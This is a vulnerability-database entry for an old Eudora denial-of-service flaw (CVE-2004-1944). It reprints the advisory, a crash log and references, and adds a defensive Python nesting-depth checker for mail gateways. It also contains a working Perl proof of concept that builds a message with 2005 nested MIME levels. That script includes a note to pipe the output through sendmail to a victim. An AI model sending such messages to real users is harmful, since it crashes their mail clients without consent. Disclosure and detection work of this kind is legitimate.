Qualcomm Eudora MIME Message Nesting Denial of Service Vulnerability

Vulnerability ID: 1107875
Vulnerability type: Other
Published: 2004-04-14
Updated: 2005-10-20
CVE ID: CVE-2004-1944
CNNVD-ID: CNNVD-200404-026
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/24000
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-026
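|Vulnerability details
Eudora 6.1 and 6.0.3 for Windows are vulnerable. A remote attacker can cause a denial of service (crash) via a deeply nested multipart MIME message.
|Exploit (EXP)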
source: http://www.securityfocus.com/bid/10137/info

It has been reported that Eudora is prone to a denial of service vulnerability when handling e-mail containing excessive MIME nesting. The problem is known to occur when the application attempts to decode the deeply nested message.

Successful exploitation of this issue may allow an attacker to cause the application to crash due to corruption of stack memory. It is not known if this issue is further exploitable to execute arbitrary code.

It should be noted that this condition may be persistent since the offending message may remain in the client's mail spool.

Eudora 6.0.3 is reported to be vulnerable to this issue; however, other versions may be affected as well.

#!/usr/bin/perl --

print "From: me\n";
print "To: you\n";
print "Subject: nested multipart test\n";
print "Mime-Version: 1.0\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n";

&nest(0);
print "\n";

sub nest {
  my ($x) = @_;
  my $b = sprintf("bndry%04d",$x);
  print "Content-Type: multipart/mixed; boundary=\"$b\"\n\n";
  print "--$b\n";
  print "Content-Type: text/plain\n\n";
  print "Level $x\n\n";

# No problem for 1995, but crash for 2005 deep nesting:
#
# (378.1c4): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000409 ebx=00000001 ecx=00000000 edx=00000001 esi=000338a8 edi=62000000
# eip=77f862ed esp=00032f10 ebp=000337b0 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010202
# ntdll!LdrLoadAlternateResourceModule+9:
# 77f862ed 53               push    ebx

  if ($x < 2005) {
    print "--$b\n";
    &nest($x+1);
  }
  print "--$b\n";
  print "Content-Type: text/plain\n\n";
  print "Final $x\n";
  print "--$b--\n\n";
}
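
A mail-gateway check for the condition described above, given as an added example that is not part of the original advisory or exploit entry: it measures multipart nesting with an explicit stack instead of recursion, so the checker itself cannot exhaust its call stack, and it stops at a configurable limit. The names `multipart_depth` and `constructed_sample` and the default limit of 32 are assumptions chosen for illustration.

```python
import re

# Captures the boundary parameter of a multipart Content-Type header.
_BOUNDARY = re.compile(
    r'^content-type:\s*multipart/[^;]*;.*?\bboundary\s*=\s*"?([^";\s]+)"?',
    re.I | re.M)

def multipart_depth(raw, limit=32):
    """Return (deepest_level_seen, too_deep) without recursing per level."""
    stack = []                      # open boundaries, outermost first
    headers, in_headers, deepest = [], True, 0
    for line in raw.splitlines():
        if in_headers:
            if line.strip():
                headers.append(line)
                continue
            # Blank line ends a header block: unfold it, look for a boundary.
            block = re.sub(r'\n[ \t]+', ' ', '\n'.join(headers))
            found = _BOUNDARY.search(block)
            if found:
                stack.append(found.group(1))
                deepest = max(deepest, len(stack))
                if deepest > limit:
                    return deepest, True    # stop here; caller quarantines
            headers, in_headers = [], False
        elif line.startswith('--') and stack:
            token = line.rstrip()[2:]
            closing = token.endswith('--') and token[:-2] in stack
            name = token[:-2] if closing else token
            if name in stack:
                # Innermost match wins; unterminated inner parts are dropped.
                inner = max(i for i, b in enumerate(stack) if b == name)
                del stack[inner + 1:]
                if closing:
                    stack.pop()
                else:
                    in_headers = True       # the next lines are part headers
    return deepest, False

def constructed_sample(levels):
    """Constructed test message: `levels` multipart containers, one leaf."""
    lines = ["From: a@example.test", "Subject: constructed sample"]
    for i in range(levels):
        lines += ['Content-Type: multipart/mixed; boundary="b%04d"' % i,
                  "", "--b%04d" % i]
    lines += ["Content-Type: text/plain", "", "leaf"]
    lines += ["--b%04d--" % i for i in reversed(range(levels))]
    return "\n".join(lines) + "\n"
```

A message for which the second return value is true can be quarantined or bounced before it reaches a client's mail spool, which also avoids the persistent-crash condition noted above.
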
|References

Source: XF
Name: eudora-mime-message-dos(15857)
Link: http://xforce.iss.net/xforce/xfdb/15857
Source: BID
Name: 10137
Link: http://www.securityfocus.com/bid/10137
Source: SECUNIA
Name: 11360
Link: http://secunia.com/advisories/11360
Source: BUGTRAQ
Name: 20040419Eudora6.1isevil
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=108241694627321&w=2
Source: FULLDISC
Name: 20040414Eudora6.0.3nestedMIMEDoS
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020075.html
